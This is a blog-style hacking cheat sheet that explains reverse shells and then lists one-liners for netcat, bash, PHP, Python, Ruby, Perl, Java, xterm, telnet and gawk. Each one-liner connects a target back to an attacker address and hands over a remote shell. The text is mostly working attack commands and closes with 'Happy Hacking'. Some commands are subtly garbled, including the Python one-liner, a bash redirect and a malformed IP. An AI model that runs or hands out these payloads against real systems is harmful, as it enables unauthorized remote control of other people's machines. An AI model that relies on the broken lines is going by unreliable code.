Hack With Reverse Shell Cheatsheet

Picture Credit: Pexels

What is Reverse Shell?

To gain control of a compromised or vulnerable system, the attacker tries to get an interactive shell access for arbitrary command execution. Using that access, one can try to elevate their access to take full control over the whole system. Nowadays, systems are protected by firewalls. So an attacker can't connect to a system directly. But if someone uploads a reverse shell on the system and execute it, the system will connect to the attacker. All an attacker have to do is to listen for that connection.

How Reverse Shell Works

Generally, reverse shell works exactly opposite of bind shell. When a machine owned by the attacker connects to a remote machine and request a shell session, it's called bind shell. But when the remote host or the target host initiates a outgoing connection to a listening host and a shell session is established, then it's called reverse shell.

The general approach of a hacker is to compromise the system and look for a way to upload a reverse shell. It can be a old version of software which has a major vulnerability or a faulty service running on the host. Then execute the reverse shell and you can run commands to penetrate the system further more.

Reverse Shell Cheatsheet

At first, the hacker needs to start a listener in their system to listen for a connection. To start a listener---

$ nc -lvnp 1234

Netcat Reverse Shell

$ nc -e /bin/sh 10.0.0.1 1234

$ /bin/sh | nc [Attacking_ip] 80

$ rm -f /tmp/p; mknod /tmp/p p && nc [Attacking_ip] 4444 0/tmp/p

If you have the wrong version of netcat installed, you might still be able to get your reverse shell back like this.

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2&>1 | nc 10.0.0.1 1234 > /tmp/f

Bash Reverse Shell

$ exec /bin/bash 0&0 2>&0

$ 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80;sh <&196 >&196 2>&196

$ exec 5<>/dev/tcp/ATTACKING-IP/80

$ cat <&5 | while read line; do $line 2>&5 >&5; done

OR,

$ while read line 0<&5; do $line 2>&5 >&5; done

$ bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

$ php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

(Assumes TCP uses file descriptor 3. If  it doesn't work, try 4,5 or 6)

Python Reverse Shell

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.fileno(s.fileno(),2);p.subprocess(["/bin/sh","-i"]);'

RUBY Reverse Shell

$ ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PERL Reverse Shell

$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    PERL Windows Reverse Shell

    $ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN-  >fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

    $ perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

JAVA Reverse Shell

$  r = Runtime.getRuntime()

  p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.01/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])

   p.waitFor()

XTERM Reverse Shell

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you(10.0.0.1) on TCP port 6001.

$ xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server(:1 - which listens on port 6001). One way to do this is with Xnest(to be run on your system):

$ Xnest :1

You'll need to authorize the target to connect to you (command also run on your host):

$ xhost +targetip

TELNET Reverse Shell

$ rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

$ telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

GAWK Reverse Shell

#!/usr/bin/gawk -f 

BEGIN{

Port = 8080

Promt = "bkd> "

Service = "/inet/tcp/" Port "/0/0" <br>

   while (1) { <br>

           do { <br>

                   printf Prompt |& Service <br>

                   Service |& getline cmd <br>

                   if (cmd) { <br>

                           while ((cmd |& getline) > 0) <br>

                                   print $0 |& Service <br>

                           close(cmd) <br>

                   } <br>

           } while (cmd != "exit") <br>

           close(Service) <br>

   } 

}

Note: If you're a Debian user like kali Linux or Parrot Os, then you've some default webshells in /usr/share/webshells directory. And you can also generate reverse shell with msfvenom. You can keep metasploit in your arsenal.

XTERM: In computing, xterm is the standard terminal emulator for the X Window System. A user can have many different invocations of xterm running at once on the same display, each of which provides independent input/output for the process running in it (normally the process is a Unix shell).

(Wikipedia)

GAWK: gawk is the GNU implementation of the Awk programming language, first developed for the UNIX operating system in the 1970s. The Awk programming language specializes in dealing with data formatting in text files, particularly text data organized in columns. (RedHat)

Reference:

🔗https://highon.coffee/blog/reverse-shell-cheat-sheet/

🔗http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

That's some reverse shell examples. Happy Hacking!!!😊😊